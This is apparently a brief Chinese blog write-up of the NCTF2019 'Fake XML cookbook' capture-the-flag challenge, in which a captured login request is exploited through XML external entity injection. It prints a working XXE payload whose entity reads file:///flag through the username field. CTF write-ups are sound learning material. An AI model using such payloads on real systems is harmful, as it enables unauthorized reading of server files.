[NCTF2019]Fake XML cookbook

xml的题目放着好久了没做,做一下顺便学习。
浅谈XML实体注入漏洞
[NCTF2019]Fake XML cookbook
是个登录场景,登录抓包。
[NCTF2019]Fake XML cookbook
很明显的xml注入

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

[NCTF2019]Fake XML cookbook
拿到flag

上一篇:GAN01: Introductory guide to Generative Adversarial Networks (GANs) and their promise!


下一篇:2019-ICPC沈阳重现:7-1 A-Leftbest